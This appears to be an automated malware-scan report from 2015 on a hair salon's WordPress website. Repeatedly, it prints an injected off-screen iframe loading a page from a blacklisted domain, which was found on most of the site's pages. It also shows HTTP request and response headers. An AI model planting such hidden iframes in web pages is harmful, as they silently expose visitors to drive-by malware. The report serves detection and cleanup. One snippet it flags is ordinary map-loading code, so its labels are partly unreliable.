Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zoeshairdesign.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://zoeshairdesign.com/ | 200 OK Content-Length: 24431 Content-Type: text/html | malicious |
Page code contains blacklisted domain: capemadefieldguide.org <!DOCTYPE html> <!--[if IE 7]> <html id="ie7" lang="en" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]> <html id="ie8" lang="en" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 9]> <html id="ie9" lang="en" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if !(IE 6) | !(IE 7) | !(IE 8) ] | !(IE 9) ><!--> <html lang="en" prefix="og: http://ogp.me/n ...[4472 bytes skipped]... Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html This URL is marked by Yandex as suspicious <iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> | ||
http://zoeshairdesign.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/x-javascript | clean |
http://zoeshairdesign.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://zoeshairdesign.com/wp-content/plugins/fancybox-for-wordpress/fancybox/jquery.fancybox.js?ver=1.3.4 | 200 OK Content-Length: 15667 Content-Type: application/x-javascript | clean |
http://zoeshairdesign.com/wp-content/themes/weaver-ii/js/weaverjslib.min.js?ver=1.3.4 | 200 OK Content-Length: 8869 Content-Type: application/x-javascript | clean |
http://zoeshairdesign.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.44.0-2013.09.15 | 200 OK Content-Length: 14701 Content-Type: application/x-javascript | clean |
http://zoeshairdesign.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.5.3 | 200 OK Content-Length: 8326 Content-Type: application/x-javascript | clean |
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201510 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://zoeshairdesign.com/pricing/ | 200 OK Content-Length: 24839 Content-Type: text/html | malicious |
Page code contains blacklisted domain: capemadefieldguide.org <!DOCTYPE html> <!--[if IE 7]> <html id="ie7" lang="en" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]> <html id="ie8" lang="en" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 9]> <html id="ie9" lang="en" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if !(IE 6) | !(IE 7) | !(IE 8) ] | !(IE 9) ><!--> <html lang="en" prefix="og: http://ogp.me/n ...[4607 bytes skipped]... Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html This URL is marked by Yandex as suspicious <iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> | ||
http://zoeshairdesign.com/hair-body-products/ | 200 OK Content-Length: 26827 Content-Type: text/html | malicious |
Page code contains blacklisted domain: capemadefieldguide.org <!DOCTYPE html> <!--[if IE 7]> <html id="ie7" lang="en" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]> <html id="ie8" lang="en" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 9]> <html id="ie9" lang="en" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if !(IE 6) | !(IE 7) | !(IE 8) ] | !(IE 9) ><!--> <html lang="en" prefix="og: http://ogp.me/n ...[4469 bytes skipped]... Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html This URL is marked by Yandex as suspicious <iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> | ||
http://zoeshairdesign.com/contact-us/ | 200 OK Content-Length: 25520 Content-Type: text/html | malicious |
Page code contains blacklisted domain: capemadefieldguide.org <!DOCTYPE html> <!--[if IE 7]> <html id="ie7" lang="en" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]> <html id="ie8" lang="en" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 9]> <html id="ie9" lang="en" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if !(IE 6) | !(IE 7) | !(IE 8) ] | !(IE 9) ><!--> <html lang="en" prefix="og: http://ogp.me/n ...[4462 bytes skipped]... Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html This URL is marked by Yandex as suspicious <iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> | ||
http://zoeshairdesign.com/location/ | 200 OK Content-Length: 29581 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof google === 'object' && typeof google.maps === 'object') { } else { var gmapsJsHost = (("https:" == document.location.protocol) ? "https://" : "http://"); document.write(unescape("%3Cscript src='" + gmapsJsHost + "maps.google.com/maps/api/js?sensor=false' type='text/javascript'%3E%3C/script%3E")); } Antivirus reports:
Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html This URL is marked by Yandex as suspicious <iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> | ||
http://zoeshairdesign.com/local-artists/ | 200 OK Content-Length: 26311 Content-Type: text/html | malicious |
Page code contains blacklisted domain: capemadefieldguide.org <!DOCTYPE html> <!--[if IE 7]> <html id="ie7" lang="en" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]> <html id="ie8" lang="en" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 9]> <html id="ie9" lang="en" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if !(IE 6) | !(IE 7) | !(IE 8) ] | !(IE 9) ><!--> <html lang="en" prefix="og: http://ogp.me/n ...[4476 bytes skipped]... Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html This URL is marked by Yandex as suspicious <iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> | ||
http://zoeshairdesign.com/we-support-local-non-profits/ | 200 OK Content-Length: 25432 Content-Type: text/html | malicious |
Page code contains blacklisted domain: capemadefieldguide.org <!DOCTYPE html> <!--[if IE 7]> <html id="ie7" lang="en" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]> <html id="ie8" lang="en" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 9]> <html id="ie9" lang="en" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if !(IE 6) | !(IE 7) | !(IE 8) ] | !(IE 9) ><!--> <html lang="en" prefix="og: http://ogp.me/n ...[4411 bytes skipped]... Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html This URL is marked by Yandex as suspicious <iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> | ||
http://zoeshairdesign.com/test404page.js | 404 Not Found Content-Length: 24167 Content-Type: text/html | malicious |
Page code contains blacklisted domain: capemadefieldguide.org <!DOCTYPE html> <!--[if IE 7]> <html id="ie7" lang="en" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]> <html id="ie8" lang="en" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 9]> <html id="ie9" lang="en" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if !(IE 6) | !(IE 7) | !(IE 8) ] | !(IE 9) ><!--> <html lang="en" prefix="og: http://ogp.me/n ...[4457 bytes skipped]... Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html This URL is marked by Yandex as suspicious <iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zoeshairdesign.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Mar 2015 06:55:08 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=UTF-8
X-Pingback: http://zoeshairdesign.com/xmlrpc.php
X-Powered-By: PHP/5.3.14
GET / HTTP/1.1
Host: zoeshairdesign.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Mar 2015 06:55:08 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=UTF-8
X-Pingback: http://zoeshairdesign.com/xmlrpc.php
X-Powered-By: PHP/5.3.14
Second query (visit from search engine):
GET / HTTP/1.1
Host: zoeshairdesign.com
Referer: http://www.google.com/search?q=zoeshairdesign.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zoeshairdesign.com
Referer: http://www.google.com/search?q=zoeshairdesign.com
Result:
The result is similar to the first query. There are no suspicious redirects found.